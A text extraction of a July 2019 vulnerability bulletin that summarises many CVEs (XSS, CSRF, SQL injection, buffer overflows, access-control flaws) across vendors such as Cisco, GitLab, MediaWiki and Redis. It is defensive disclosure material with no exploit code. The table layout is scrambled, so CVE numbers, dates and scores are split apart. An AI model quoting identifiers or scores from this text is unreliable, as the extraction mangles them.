An issue was CVE- discovered in the Teclib 2019- News plugin through 12724 1.5.2 for GLPI. It 2019- teclib-edition -- fields 4.3 MISC allows a stored XSS 07-10 MISC attack via the CONFI $_POST['name'] RM parameter.
A cross-site scripting (XSS) vulnerability in static/js/trape.js in Trape through 2019-05- 08 allows remote CVE- attackers to inject 2019- 2019- trape_project -- trape arbitrary web script or 4.3 07-10 13488 HTML via the country, MISC query, or refer parameter to the /register URI, because the jQuery prepend() method is used.
CVE- TYPO3 8.3.0 through 2019- 8.7.26 and 9.0.0 2019- typo3 -- typo3 4.3 12748 through 9.5.7 allows 07-09 CONFI XSS. RM
Cross-site request CVE- forgery (CSRF) 2019- vulnerability in Custom waspthemes -- 2019- 5984 CSS Pro 1.0.3 and 6.8 custom_css_pro 07-05 MISC earlier allows remote MISC attackers to hijack the MISC authentication of CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
administrators via unspecified vectors.
Cross-site request forgery (CSRF) vulnerability in CVE- GROWI v3.4.6 and 2019- earlier allows remote 2019- weseek -- growi 6.8 5968 attackers to hijack the 07-05 MISC authentication of MISC administrators via updating user's 'Basic Info'.
Open redirect vulnerability in GROWI v3.4.6 and CVE- earlier allows remote 2019- 2019- weseek -- growi attackersto redirect 5.8 5969 07-05 users to arbitrary web MISC sites and conduct MISC phishing attacks via the process of login.
A cross-site scripting (XSS) vulnerability in CVE- noMenu() and 2019- noSubMenu() in 12930 core/navigation/MENU CONFI 2019- wikindx_project -- wikindx .php in WIKINDX 4.3 RM 07-08 prior to version 5.8.1 CONFI allows remote attackers RM to inject arbitrary web CONFI script or HTML via the RM method parameter. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
Cross-site scripting vulnerability in Zoho CVE- SalesIQ 1.0.8 and 2019- earlier allows remote 2019- zoho -- salesiq 4.3 5962 attackers to inject 07-05 MISC arbitrary web script or MISC HTML via unspecified vectors.
Cross-site request forgery (CSRF) vulnerability in Zoho CVE- SalesIQ 1.0.8 and 2019- 2019- zoho -- salesiq earlier allows remote 6.8 5963 07-05 attackers to hijack the MISC authentication of MISC administrators via unspecified vectors.
An issue was discovered in Zoho CVE- ManageEngine 2019- zohocorp -- 2019- AssetExplorer. There is 4.3 12595 manageengine_assetexplorer 07-11 XSS via the MISC RCSettings.do MISC rdsName parameter.
An issue was discovered in Zoho ManageEngine CVE- AssetExplorer. There is 2019- zohocorp -- 2019- XSS via 4.3 12596 manageengine_assetexplorer 07-11 SoftwareListView.do MISC with the parameter MISC swType or swComplianceType. CV Source Primary Publis SS & Description Vendor -- Product hed Sco Patch re Info
An issue was discovered in Zoho CVE- ManageEngine 2019- zohocorp -- AssetExplorer. There is 2019- 4.3 12597 manageengine_assetexplorer XSS via 07-11 MISC ResourcesAttachments. MISC jsp with the parameter pageName.
An issue was discovered in the Purchase component of CVE- Zoho ManageEngine zohocorp -- 2019- ServiceDesk Plus. 2019- manageengine_servicedesk_p 4.3 12539 There is XSS via the 07-11 lus MISC SearchN.do search MISC field, a different vulnerability than CVE-2019-12189.
Back to top
Low Vulnerabilities
Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
In MiniCMS V1.10, stored XSS was found CVE- in mc-admin/page- 2019-07- 2019- 1234n -- minicms 3.5 edit.php (content box), 05 13339 which can be used to get MISC a user's cookie. Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
In MiniCMS V1.10, stored XSS was found in mc-admin/post- edit.php via the content CVE- box. An attacker can use 2019-07- 2019- 1234n -- minicms it to get a user's cookie. 3.5 05 13340 This is different from MISC CVE-2018-10296, CVE-2018-16233, CVE-2018-20520, and CVE-2019-13186.
In MiniCMS V1.10, stored XSS was found CVE- in mc-admin/conf.php 2019-07- 2019- 1234n -- minicms 3.5 (comment box), which 05 13341 can be used to get a MISC user's cookie.
A stored XSS vulnerability in the Agent/Center component of CyberPower PowerPanel Business Edition 3.4.0 allows a CVE- privileged attacker to 2019- cyberpowersystems embed malicious 2019-07- 3.5 13070 -- powerpanel JavaScript in the SNMP 09 MISC trap receivers form. MISC Upon visiting the /agent/action_recipient Event Action/Recipient page, the embedded code will be executed in the browser of the victim. Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
GitLab CE/EE, versions 11.3 before 11.3.11, 11.4 before 11.4.8, and CVE- 11.5 before 11.5.1, are 2018- 2019-07- gitlab -- gitlab vulnerable to an XSS 3.5 19570 10 vulnerability in CONFIRM Markdown fields via MISC unrecognized HTML tags.
GitLab CE/EE, versions 10.3 up to 11.x before CVE- 11.3.11, 11.4 before 2018- 11.4.8, and 11.5 before 2019-07- gitlab -- gitlab 3.5 19573 11.5.1, are vulnerable to 10 CONFIRM an XSS vulnerability in MISC Markdown fields via Mermaid.
GitLab CE/EE, versions 7.6 up to 11.x before CVE- 11.3.11, 11.4 before 2018- 11.4.8, and 11.5 before 2019-07- gitlab -- gitlab 3.5 19574 11.5.1, are vulnerable to 10 MISC an XSS vulnerability in MISC the OAuth authorization page.
GitLab EE version 11.5 CVE- is vulnerable to a 2018- persistent XSS 2019-07- gitlab -- gitlab 3.5 19579 vulnerability in the 10 CONFIRM Operations page. This is MISC fixed in 11.5.1.
In HIDL, safe_union, CVE- 2019-07- google -- android and other C++ 2.1 2019-2104 08 structs/unions being sent CONFIRM Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
to application processes, there are uninitialized fields. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A- 131356202
In setup wizard there is a bypass of some checks when wifi connection is skipped. This could lead to factory reset protection bypass with CVE- 2019-07- google -- android no additional privileges 2.1 2019-2113 08 needed. User interaction CONFIRM is not needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-122597079.
In checkQueryPermission of TelephonyProvider.java, there is a possible CVE- 2019-07- google -- android disclosure of secure data 2.1 2019-2117 08 due to a missing CONFIRM permission check. This could lead to local information disclosure about carrier systems Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-7.0 Android- 7.1.1 Android-7.1.2 Android-8.0 Android- 8.1 Android-9. Android ID: A-124107808.
In various functions of Parcel.cpp, there are uninitialized or partially initialized stack variables. These could lead to local information disclosure with no CVE- additional execution 2019-07- google -- android 2.1 2019-2118 privileges needed. User 08 CONFIRM interaction is not needed for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A- 130161842.
In multiple functions of key_store_service.cpp, there is a possible Information Disclosure due to improper locking. CVE- 2019-07- google -- android This could lead to local 2.1 2019-2119 08 information disclosure CONFIRM of protected data with no additional execution privileges needed. User interaction is not needed Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
for exploitation. Product: Android. Versions: Android-8.0 Android-8.1 Android-9. Android ID: A- 131622568.
IBM Multicloud Manager 3.1.0, 3.1.1, and 3.1.2 ibm-mcm- chart could allow a local CVE- ibm -- attacker with admin 2019-07- 2019-4118 2.1 multicloud_manager privileges to obtain 11 CONFIRM highly sensitive XF information upon deployment. IBM X- Force ID: 158144.
CVE- libosinfo 1.5.0 allows 2019- local users to discover 13313 credentials by listing a 2019-07- MLIST libosinfo -- libosinfo process, because 2.1 05 MISC credentials are passed to MISC osinfo-install-script via MISC the command line. MISC
CVE- Nagios XI before 5.5.4 2018- has XSS in the auto 2019-07- nagios -- nagios_xi 3.5 17147 login admin 10 BID management page. MISC
virt-bootstrap 1.1.0 CVE- allows local users to redhat -- virt- 2019-07- 2019- discover a root 2.1 bootstrap 05 13314 password by listing a MLIST process, because this Primary CVSS Source & Description Published Vendor -- Product Score Patch Info
password may be MISC present in the --root- MISC password option to virt_bootstrap.py.
Back to top
Severity Not Yet Assigned
Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
Alarm.com ADC-V522IR 0100b9 devices have Incorrect CV Access Control, a different issue not E- than CVE-2018-19588. This 201 yet 201 alarm.com -- adc- occurs because of incorrect 9- cal 9- v522ir_devices protection of VPN certificates 07- cul 965 (used for initiating a VPN 11 ate 7 session to the Alarm.com d MIS infrastructure) on the local C camera device.
CV not E- 201 yet 201 Alarm.com ADC-V522IR alarm.com -- adc- 9- cal 8- 0100b9 devices have Incorrect v522ir_devices 07- cul 195 Access Control. 11 ate 88 d MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
In Apache Kafka versions between 0.11.0.0 and 2.1.0, it is possible to manually craft a CV Produce request which bypasses not E- transaction/idempotent ACL 201 yet 201 validation. Only authenticated 9- cal 8- apache -- kafka clients with Write permission on 07- cul 171 the respective topics are able to 11 ate 96 exploit this vulnerability. Users d MIS should upgrade to 2.1.1 or later C where this vulnerability has been fixed.
hide.me before 2.4.4 on macOS suffers from a privilege escalation vulnerability in the connectWithExecutablePath:con CV figFilePath:configFileName not E- method of the 201 yet 201 me_hide_vpnhelper.Helper class 9- cal 9- apple -- macos in the me.hide.vpnhelper macOS 07- cul 121 privilege helper tool. This 08 ate 74 method takes user-supplied d MIS input and can be used to escalate C privileges, as well as obtain the ability to run any application on the system in the root context.
Arlo Basestation firmware CV not 1.12.0.1_27940 and prior E- 201 yet contain a hardcoded username 201 9- cal arlo -- basestation and password combination that 9- 07- cul allows root access to the device 395 09 ate when an onboard serial interface 0 d is connected to. CO Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
NFI RM
Arlo Basestation firmware CV 1.12.0.1_27940 and prior E- firmware contain a networking not 201 misconfiguration that allows 201 yet 9- access to restricted network 9- cal arlo -- basestation 394 interfaces. This could allow an 07- cul 9 attacker to upload or download 09 ate CO arbitrary files and possibly d NFI execute malicious code on the RM device.
A SQL injection vulnerability in the reporting component of CV Avaya Control Manager could E- allow an unauthenticated not 201 attacker to execute arbitrary 201 yet 9- SQL commands and retrieve 9- cal 700 avaya -- control_manager sensitive data related to other 07- cul 3 users on the system. Affected 11 ate BID versions of Avaya Control d CO Manager include 7.x and 8.0.x NFI versions prior to 8.0.4.0. RM Unsupported versions not listed here were not evaluated.
On AVTECH Room Alert 3E CV not devices before 2.2.5, an attacker E- 201 yet with access to the device's web 201 9- cal avtech -- room_alert_3e interface may escalate privileges 9- 07- cul from an unauthenticated user to 133 07 ate administrator by performing a 79 d cmd.cgi?action=ResetDefaults& MIS Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
src=RA reset and using the C default credentials to get in. MIS C
CV not E- BKS EBK Ethernet-Buskoppler 201 yet 201 bks -- bks_ebk_ethernet- Pro before 3.01 allows 9- cal 9- buskoppler_pro Unrestricted Upload of a File 07- cul 129 with a Dangerous Type. 05 ate 71 d MIS C
An information disclosure vulnerability leading to a potential local escalation of CV privilege in the procfs service not E- (the /proc filesystem) of 201 yet 201 blackberry -- BlackBerry QNX Software 9- cal 9- qnx_software_development Development Platform 07- cul 899 _platform version(s) 6.5.0 SP1 and earlier 12 ate 8 could allow an attacker to d MIS potentially gain unauthorized C access to a chosen process address space.
CV Any URLs with E- not download_attachment.php under 201 201 yet templates or home folders can 9- 9- cal broadlearning -- eclass allow arbitrary files downloaded 988 07- cul without login in BroadLearning 6 11 ate eClass before version CO d ip.2.5.10.2.1. NFI RM Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CO NFI RM CO NFI RM
CV E- nodeimp.exe in Castle Rock not 201 SNMPc before 9.0.12.1 and 201 yet 9- castle_rock_computing -- 10.x before 10.0.9 has a stack- 9- cal 134 snmpc based buffer overflow via a long 07- cul 94 variable string in a Map Objects 12 ate MIS text file. d C MIS C
A vulnerability in the cryptographic driver for Cisco Adaptive Security Appliance Software (ASA) and Firepower Threat Defense (FTD) Software CV could allow an unauthenticated, E- remote attacker to cause the not cisco -- 201 device to reboot unexpectedly. 201 yet adaptive_security_applicanc 9- The vulnerability is due to 9- cal e_software_and_firepower_t 187 incomplete input validation of a 07- cul hreat_defense_software 3 Secure Sockets Layer (SSL) or 10 ate BID Transport Layer Security (TLS) d CIS ingress packet header. An CO attacker could exploit this vulnerability by sending a crafted TLS/SSL packet to an interface on the targeted device. An exploit could allow the Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
attacker to cause the device to reload, which will result in a denial of service (DoS) condition. Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode and in single or multiple context mode. This vulnerability can be triggered by IPv4 and IPv6 traffic. A valid SSL or TLS session is required to exploit this vulnerability.
A vulnerability in Cisco Advanced Malware Protection (AMP) for Endpoints for Windows could allow an authenticated, local attacker with administrator privileges to CV execute arbitrary code. The not E- cisco -- vulnerability is due to 201 yet 201 advanced_malware_protecti insufficient validation of 9- cal 9- on_for_endpoints_for_wind dynamically loaded modules. 07- cul 193 ows An attacker could exploit this 05 ate 2 vulnerability by placing a file in d CIS a specific location in the CO Windows filesystem. A successful exploit could allow the attacker to execute the code with the privileges of the AMP service. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A vulnerability in the attachment scanning of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, remote attacker to bypass CV configured content filters on the not E- device. The vulnerability is due 201 yet 201 cisco -- to improper input validation of 9- cal 9- email_security_appliance the email body. An attacker 07- cul 192 could exploit this vulnerability 05 ate 1 by naming a malicious d CIS attachment with a specific CO pattern. A successful exploit could allow the attacker to bypass configured content filters that would normally block the attachment.
A vulnerability in the email message scanning of Cisco AsyncOS Software for Cisco Email Security Appliance (ESA) could allow an unauthenticated, CV remote attacker to bypass not E- configured filters on the device. 201 yet 201 The vulnerability is due to cisco -- 9- cal 9- improper input validation of email_security_appliance 07- cul 193 certain email fields. An attacker 05 ate 3 could exploit this vulnerability d CIS by sending a crafted email CO message to a recipient protected by the ESA. A successful exploit could allow the attacker to bypass configured message filters and inject arbitrary Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
scripting code inside the email body. The malicious code is not executed by default unless the recipient's email client is configured to execute scripts contained in emails.
A vulnerability in Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an authenticated, remote attacker with administrator privileges to overwrite or read arbitrary files on the underlying CV operating system (OS) of an not E- affected device. The 201 yet 201 cisco -- vulnerability is due to improper 9- cal 9- enterprise_nfv_infrastructur input validation in NFVIS 07- cul 189 e_software filesystem commands. An 05 ate 4 attacker could exploit this d CIS vulnerability by using crafted CO variables during the execution of an affected command. A successful exploit could allow the attacker to overwrite or read arbitrary files on the underlying OS.
A vulnerability in Cisco CV Enterprise NFV Infrastructure not E- Software (NFVIS) could allow 201 yet 201 cisco -- an authenticated, local attacker 9- cal 9- enterprise_nfv_infrastructur to execute arbitrary commands 07- cul 189 e_software on the underlying operating 05 ate 3 system (OS) of an affected d CIS device as root. The vulnerability CO Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
is due to insufficient input validation of a configuration file that is accessible to a local shell user. An attacker could exploit this vulnerability by including malicious input during the execution of this file. A successful exploit could allow the attacker to execute arbitrary commands on the underlying OS as root.
Multiple vulnerabilities in the RSS dashboard in the web- based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management CV interface of an affected device. not E- The vulnerabilities are due to 201 yet 201 cisco -- insufficient validation of user- 9- cal 9- firepower_management_cen supplied input by the web-based 07- cul 193 ter management interface of the 05 ate 1 affected device. An attacker d CIS could exploit these CO vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
Multiple vulnerabilities in the RSS dashboard in the web- based management interface of Cisco Firepower Management Center (FMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management CV interface of an affected device. not E- The vulnerabilities are due to 201 yet 201 cisco -- insufficient validation of user- 9- cal 9- firepower_management_cen supplied input by the web-based 07- cul 193 ter management interface of the 05 ate 0 affected device. An attacker d CIS could exploit these CO vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
A vulnerability in the implementation of Border CV Gateway Protocol (BGP) not E- functionality in Cisco IOS XR 201 yet 201 Software could allow an 9- cal 9- cisco -- ios_xr_software unauthenticated, remote attacker 07- cul 190 to cause a denial of service 05 ate 9 (DoS) condition on an affected d CIS system. The vulnerability is due CO to incorrect processing of certain BGP update messages. An Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
attacker could exploit this vulnerability by sending BGP update messages that include a specific set of attributes to be processed by an affected system. A successful exploit could allow the attacker to cause the BGP process to restart unexpectedly, resulting in a DoS condition. The Cisco implementation of BGP accepts incoming BGP traffic from explicitly defined peers only. To exploit this vulnerability, the malicious BGP update message would need to come from a configured, valid BGP peer or would need to be injected by the attacker into the victim's BGP network on an existing, valid TCP connection to a BGP peer.
A vulnerability in Cisco SIP IP Phone Software for Cisco IP Phone 7800 Series and 8800 Series could allow an CV unauthenticated, remote attacker not E- to cause a denial of service 201 yet 201 cisco -- (DoS) condition on an affected 9- cal 9- ip_phone_7800_series_and_ phone. The vulnerability is due 07- cul 192 8800_series to insufficient validation of 05 ate 2 input Session Initiation Protocol d CIS (SIP) packets. An attacker could CO exploit this vulnerability by altering the SIP replies that are sent to the affected phone during Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
the registration process. A successful exploit could allow the attacker to cause the phone to reboot and not complete the registration process.
A vulnerability in the Secure Sockets Layer (SSL) input packet processor of Cisco Small Business 200, 300, and 500 Series Managed Switches could allow an unauthenticated, remote attacker to cause a CV memory corruption on an not E- cisco -- affected device. The 201 yet 201 small_business_200_and_30 vulnerability is due to improper 9- cal 9- 0_and_500_series_managed validation of HTTPS packets. 07- cul 189 _switches An attacker could exploit this 05 ate 2 vulnerability by sending a d CIS malformed HTTPS packet to the CO management web interface of the affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a denial of service (DoS) condition.
A vulnerability in the web CV interface of Cisco Small not E- Business 200, 300, and 500 cisco -- 201 yet 201 Series Managed Switches could small_business_200_and_30 9- cal 9- allow an unauthenticated, 0_and_500_series_managed 07- cul 189 remote attacker to cause a denial _switches 05 ate 1 of service (DoS) condition on an d CIS affected device. The CO vulnerability is due to improper Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
validation of requests sent to the web interface. An attacker could exploit this vulnerability by sending a malicious request to the web interface of an affected device. A successful exploit could allow the attacker to cause an unexpected reload of the device, resulting in a DoS condition.
A vulnerability in the CLI of Cisco Unified Communications Domain Manager (Cisco Unified CDM) Software could allow an authenticated, local attacker to escape the restricted CV shell. The vulnerability is due to not E- insufficient input validation of 201 yet 201 cisco -- shell commands. An attacker 9- cal 9- unified_communications_do could exploit this vulnerability 07- cul 191 main_manager by executing crafted commands 05 ate 1 in the shell. A successful exploit d CIS could allow the attacker to CO escape the restricted shell and access commands in the context of the restricted shell user, which does not have root privileges.
The Windows Guest Tools in not CV Citrix XenServer 6.2 SP1 and 201 yet E- earlier allows remote attackers 9- cal 201 citrix -- xenserver to cause a denial of service 07- cul 4- (guest OS crash) via a crafted 11 ate 379 Ethernet frame. d 8 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
SEC UNI A CO NFI RM BID SEC TR AC K
Cloud Foundry UAA version prior to 73.3.0, contain CV endpoints that contains improper E- escaping. An authenticated not 201 malicious user with basic read 201 yet 9- privileges for one identity zone 9- cal cloud_foundry -- uaa 112 can extend those reading 07- cul 68 privileges to all other identity 11 ate CO zones and obtain private d NFI information on users, clients, RM and groups in all other identity zones.
CV E- 201 not 8- 201 yet 117 cloudera -- Cloudera Manager through 5.15 9- cal 44 cloudera_manager has Incorrect Access Control. 07- cul CO 11 ate NFI d RM MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
A man-in-the-middle vulnerability related to vCenter CV access was found in Cohesity E- not DataPlatform version 5.x and 201 201 yet 6.x prior to 6.1.1c. Cohesity 9- 9- cal cohesity -- dataplatform clusters did not verify TLS 112 07- cul certificates presented by 42 12 ate vCenter. This vulnerability CO d could expose Cohesity user NFI credentials configured to access RM vCenter.
CV E- A flaw was found in the 201 yaml.load() function in the osbs- not 9- client versions since 0.46 before 201 yet 101 0.56.1. Insecure use of the container_build_system -- 9- cal 35 yaml.load() function allowed the osbs-client 07- cul CO user to load any suspicious 11 ate NFI object for code execution via the d RM parsing of malicious YAML CO files. NFI RM
CSRF in the Agent/Center CV component of CyberPower E- PowerPanel Business Edition not 201 3.4.0 allows an attacker to 201 yet 9- cyberpower -- submit POST requests to any 9- cal 130 powerpanel_business forms in the web application. 07- cul 71 This can be exploited by 10 ate MIS tricking an authenticated user d C into visiting an attacker FU controlled web page. LL Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
DIS C
CV An arbitrary file read not E- vulnerability in DamiCMS 201 yet 201 v6.0.0 allows remote 9- cal 8- damicms -- damicms authenticated administrators to 07- cul 148 read any files in the server via a 10 ate 31 crafted d MIS /admin.php?s=Tpl/Add/id/ URI. C
CV Lack of authentication in file- E- viewing components in DDRT not 201 Dashcom Live 2019-05-09 201 yet 9- allows anyone to remotely 9- cal 110 ddrt -- dashcom_live access all claim details by 07- cul 20 visiting easily guessable 09 ate MIS dashboard/uploads/claim_files/c d C laim_id_ URLs. MIS C
CV Lack of authentication in case- E- exporting components in DDRT not 201 Dashcom Live through 2019-05- 201 yet 9- 08 allows anyone to remotely 9- cal 110 ddrt -- dashcom_live access all claim details by 07- cul 19 visiting easily guessable 09 ate MIS exportpdf/all_claim_detail.php? d C claim_id= URLs. MIS C Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV An Incorrect Access Control E- vulnerability was found in 201 not Wikimedia MediaWiki 1.18.0 9- 201 yet through 1.32.1. It is possible to 124 9- cal debian -- mediawiki bypass the limits on IP range 72 07- cul blocks ($wgBlockCIDRLimit) CO 10 ate by using the API. Fixed in NFI d 1.32.2, 1.31.2, 1.30.2 and RM 1.27.6. MIS C
CV E- 201 9- 124 68 An Incorrect Access Control MIS vulnerability was found in not C Wikimedia MediaWiki 1.27.0 201 yet CO through 1.32.1. Directly 9- cal NFI debian -- mediawiki POSTing to 07- cul RM Special:ChangeEmail would 10 ate MIS allow for bypassing re- d C authentication, allowing for BU potential account takeover. GT RA Q DE BIA N
MediaWiki through 1.32.1 has not CV 201 debian -- mediawiki Incorrect Access Control (issue yet E- 9- 1 of 3). A spammer can use cal 201 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
Special:ChangeEmail to send 07- cul 9- out spam with no rate limiting 10 ate 124 or ability to block them. Fixed d 67 in 1.32.2, 1.31.2, 1.30.2 and CO 1.27.6. NFI RM MIS C BU GT RA Q DE BIA N
CV E- 201 9- 124 Wikimedia MediaWiki 1.30.0 71 through 1.32.1 has XSS. not CO Loading user JavaScript from a 201 yet NFI non-existent account allows 9- cal RM debian -- mediawiki anyone to create the account, 07- cul MIS and perform XSS on users 10 ate C loading that script. Fixed in d BU 1.32.2, 1.31.2, 1.30.2 and GT 1.27.6. RA Q DE BIA N Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
CV E- 201 9- 124 73 Wikimedia MediaWiki 1.27.0 not CO through 1.32.1 might allow 201 yet NFI DoS. Passing invalid titles to the 9- cal RM debian -- mediawiki API could cause a DoS by 07- cul MIS querying the entire watchlist 10 ate C table. Fixed in 1.32.2, 1.31.2, d BU 1.30.2 and 1.27.6. GT RA Q DE BIA N
CV E- 201 9- 124 Wikimedia MediaWiki through not 70 1.32.1 has Incorrect Access 201 yet CO Control. Suppressed log in 9- cal NFI debian -- mediawiki RevisionDelete page is exposed. 07- cul RM Fixed in 1.32.2, 1.31.2, 1.30.2 10 ate MIS and 1.27.6. d C BU GT RA Q DE Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
BIA N
CV E- 201 9- 124 69 MediaWiki through 1.32.1 has not CO Incorrect Access Control. 201 yet NFI Suppressed username or log in 9- cal RM debian -- mediawiki Special:EditTags are exposed. 07- cul MIS Fixed in 1.32.2, 1.31.2, 1.30.2 10 ate C and 1.27.6. d BU GT RA Q DE BIA N
CV A stack-buffer overflow E- vulnerability was found in the 201 Redis hyperloglog data structure 9- versions 3.x before 3.2.13, 4.x not 101 before 4.0.14 and 5.x before 201 yet 93 5.0.4. By corrupting a 9- cal CO debian -- redis hyperloglog using the 07- cul NFI SETRANGE command, an 11 ate RM attacker could cause Redis to d MIS perform controlled increments C of up to 12 bytes past the end of MIS a stack-allocated buffer. C MIS Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
C BU GT RA Q DE BIA N
CV E- 201 9- 101 A heap-buffer overflow 92 vulnerability was found in the CO Redis hyperloglog data structure NFI versions 3.x before 3.2.13, 4.x not RM before 4.0.14 and 5.x before 201 yet MIS 5.0.4. By carefully corrupting a 9- cal C debian -- redis hyperloglog using the 07- cul MIS SETRANGE command, an 11 ate C attacker could trick Redis d MIS interpretation of dense HLL C encoding to write up to 3 bytes BU beyond the end of a heap- GT allocated buffer. RA Q DE BIA N
Buffer overflow in 201 not CV res_pjsip_messaging in Digium 9- yet E- digium -- asterisk Asterisk versions 13.21-cert3, 07- cal 201 13.27.0, 15.7.2, 16.4.0 and 12 cul 9- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
earlier allows remote ate 128 authenticated users to crash d 27 Asterisk by sending a specially CO crafted SIP MESSAGE NFI message. RM CO NFI RM
An issue was discovered in Asterisk Open Source through 13.27.0, 14.x and 15.x through 15.7.2, and 16.x through 16.4.0, and Certified Asterisk through 13.21-cert3. A pointer CV dereference in chan_sip while E- handling SDP negotiation 201 allows an attacker to crash not 9- Asterisk when handling an SDP 201 yet 131 answer to an outgoing T.38 re- 9- cal 61 digium -- asterisk invite. To exploit this 07- cul CO vulnerability an attacker must 12 ate NFI cause the chan_sip module to d RM send a T.38 re-invite request to CO them. Upon receipt, the attacker NFI must send an SDP answer RM containing both a T.38 UDPTL stream and another media stream containing only a codec (which is not permitted according to the chan_sip configuration).
not CV In e107 v2.1.7, output without 201 e107 -- e107 yet E- filtering results in XSS. 9- cal 201 Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
07- cul 8- 10 ate 117 d 34 MIS C
CV eQ-3 HomeMatic CCU2 devices E- before 2.41.9 and CCU3 devices not 201 before 3.43.16 have buffer 201 yet 9- eq-3 -- overflows in the ReGa ise 9- cal 101 homematic_ccu2_devices GmbH HTTP-Server 2.0 07- cul 22 component, aka HMCCU-179. 10 ate MIS This may lead to remote code d C execution. MIS C
eQ-3 HomeMatic CCU2 devices CV before 2.41.8 and CCU3 devices E- before 3.43.16 use session IDs not 201 for authentication but lack 201 yet 9- eq-3 -- authorization checks. An 9- cal 101 homematic_ccu2_devices attacker can obtain a session ID 07- cul 19 via an invalid login attempt to 10 ate MIS the RemoteApi account, aka d C HMCCU-154. This leads to MIS automatic login as admin. C
CV On eQ-3 HomeMatic CCU2 not E- devices before 2.41.8 and CCU3 201 yet 201 eq-3 -- devices before 3.43.16, 9- cal 9- homematic_ccu2_devices automatic login configuration 07- cul 101 (aka setAutoLogin) can be 10 ate 20 achieved by continuing to use a d MIS Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
session ID after a logout, aka C HMCCU-154. MIS C
CV eQ-3 HomeMatic CCU2 devices E- before 2.41.8 and CCU3 devices 201 before 3.43.15 use session IDs not 9- for authentication but lack 201 yet 101 eq-3 -- authorization checks. An 9- cal 21 homematic_ccu2_devices attacker can obtain a session ID 07- cul MIS via the user authentication 10 ate C dialogue, aka HMCCU-153. d MIS This leads to automatic login as C admin. MIS C
CV E- 201 8- An issue was discovered in 113 FasterXML jackson-databind not 07 2.0.0 through 2.9.5. Use of 201 yet CO fasterxml -- jackson- Jackson default typing along 9- cal NFI databind with a gadget class from iBatis 07- cul RM allows exfiltration of content. 09 ate MIS Fixed in 2.7.9.4, 2.8.11.2, and d C 2.9.6. MIS C MIS C field_test_gem_for_ruby_on The field_test gem 0.3.0 for 201 not CV _rails -- Ruby has unvalidated input. A 9- yet E- Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info field_test_gem_for_ruby_on method call that is expected to 07- cal 201 _rails return a value from a certain set 09 cul 9- of inputs can be made to return ate 131 any input, which can be d 46 dangerous depending on how BID applications use it. If an MIS application treats arbitrary C variants as trusted, this can lead MIS to a variety of potential C vulnerabilities like SQL injection or cross-site scripting (XSS).
FlightPath 4.x and 5.0-x allows CV directory traversal and Local E- not File Inclusion through the 201 201 yet form_include parameter in an 9- 9- cal flightpath -- flightpath index.php?q=system-handle- 133 07- cul form-submit POST request 96 10 ate because of an include_once in CO d system_handle_form_submit in NFI modules/system/system.module. RM
In GE Aestiva and Aespire CV versions 7100 and 7900, a E- vulnerability exists where serial not 201 devices are connected via an 201 yet 9- ge_healthcare -- added unsecured terminal server 9- cal 109 aestiva_and_aespire to a TCP/IP network 07- cul 66 configuration, which could 10 ate BID allow an attacker to remotely d MIS modify device configuration and C silence alarms. Sou Pu CV rce Primary blis SS & Description Vendor -- Product he Sc Pat d ore ch Info
